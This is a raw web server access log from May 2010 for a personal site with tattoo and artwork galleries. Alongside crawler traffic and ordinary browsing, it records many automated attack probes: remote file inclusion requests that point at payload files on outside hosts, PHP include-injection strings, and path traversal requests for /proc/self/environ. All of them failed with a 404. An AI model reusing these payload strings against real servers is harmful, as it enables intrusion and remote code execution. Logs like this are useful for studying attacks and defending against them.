207.46.13.146 - - [08/May/2010:11:17:20 -0500] "GET /logs/access_log.1173484800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
84.40.30.37 - - [08/May/2010:11:22:56 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:22:56 -0500] "GET /logs/access_log.1268956800%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:22:56 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:22:59 -0500] "GET /logs/access_log.1270598400%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:23:24 -0500] "GET /logs/access_log.1268956800%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:23:24 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:23:24 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
84.40.30.37 - - [08/May/2010:11:23:27 -0500] "GET /logs/access_log.1270598400%20%20//components/com_simpleboard/image_upload.php?sbp=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.195.230 - - [08/May/2010:11:23:50 -0500] "GET /logs/access_log.1166918400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.65.40 - - [08/May/2010:11:25:38 -0500] "GET /costume/thmb9.htm HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.241.190.214 - - [08/May/2010:11:29:16 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.medium.gr/logs/.logs?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:29:16 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.medium.gr/logs/.logs?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:29:16 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.medium.gr/logs/.logs?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:29:17 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:29:17 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:29:17 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:30:34 -0500] "GET /logs/access_log.1237852800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.medium.gr/logs/.logs?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
92.241.190.214 - - [08/May/2010:11:30:41 -0500] "GET /logs/access_log.1237852800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.ycrg.org/logs/.logs???? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
67.195.112.180 - - [08/May/2010:11:32:04 -0500] "GET /logs/access_log.1217030400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:11:33:10 -0500] "GET /logs/access_log.1269129600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.122.52.80 - - [08/May/2010:11:33:13 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:11:33:13 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:11:33:13 -0500] "GET /logs/access_log.1272067200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:11:34:07 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:11:34:07 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
222.122.52.80 - - [08/May/2010:11:34:07 -0500] "GET /logs/access_log.1272067200%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://anfar4.fileave.com/id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
207.46.199.37 - - [08/May/2010:11:37:20 -0500] "GET /logs/access_log.1177545600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [08/May/2010:11:39:56 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:39:56 -0500] "GET /logs/access_log.1237420800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:39:56 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:39:57 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:39:58 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:39:58 -0500] "GET /logs/access_log.1237420800%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:07 -0500] "GET /logs/access_log.1270512000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:09 -0500] "GET /logs/access_log.1270512000%20%20//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 375 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:19 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:23 -0500] "GET /logs/access_log.1265673600//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:23 -0500] "GET /logs/access_log.1265500800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
88.191.94.188 - - [08/May/2010:11:40:23 -0500] "GET /logs/access_log.1265500800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
98.226.13.85 - - [08/May/2010:11:40:44 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=20&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%26um%3D1%26hl%3Den%26sa%3DN%26tbs%3Disch:1""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:44 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:51 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:51 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:51 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:40:52 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:26 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:41:38 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
98.226.13.85 - - [08/May/2010:11:42:00 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9"
207.46.199.199 - - [08/May/2010:11:47:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.175.146.45 - - [08/May/2010:11:53:08 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.76"
212.175.146.45 - - [08/May/2010:11:53:09 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.76"
87.250.255.243 - - [08/May/2010:11:53:42 -0500] "GET /logs/access_log.1237075200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
178.32.3.34 - - [08/May/2010:12:02:07 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [08/May/2010:12:02:07 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.204.181 - - [08/May/2010:12:02:20 -0500] "GET /logs/access_log.1258848000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.251.10.117 - - [08/May/2010:12:02:22 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [08/May/2010:12:02:22 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.46.195.224 - - [08/May/2010:12:09:20 -0500] "GET /logs/access_log.1231545600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.240 - - [08/May/2010:12:10:50 -0500] "GET /logs/access_log.1168732800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
178.32.3.34 - - [08/May/2010:12:11:11 -0500] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
178.32.3.34 - - [08/May/2010:12:11:11 -0500] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.195.112.180 - - [08/May/2010:12:13:12 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [08/May/2010:12:13:12 -0500] "GET /logs/access_log.1179273600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [08/May/2010:12:14:33 -0500] "GET /artwork/postcards.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [08/May/2010:12:19:07 -0500] "GET /artwork/hospitals.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [08/May/2010:12:20:36 -0500] "GET /home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:12:20:36 -0500] "GET /logs/access_log.1213833600%20%20/home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
222.236.47.182 - - [08/May/2010:12:20:36 -0500] "GET /logs/home.php?action=http://mpress.com.ua///templates/zfxid1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:46 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:46 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:47 -0500] "GET /logs/access_log.1264723200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:50 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:51 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.121.158.187 - - [08/May/2010:12:20:52 -0500] "GET /logs/access_log.1264723200//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.fitzmartyn.co.uk/blog/ipays/id1.txt?????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
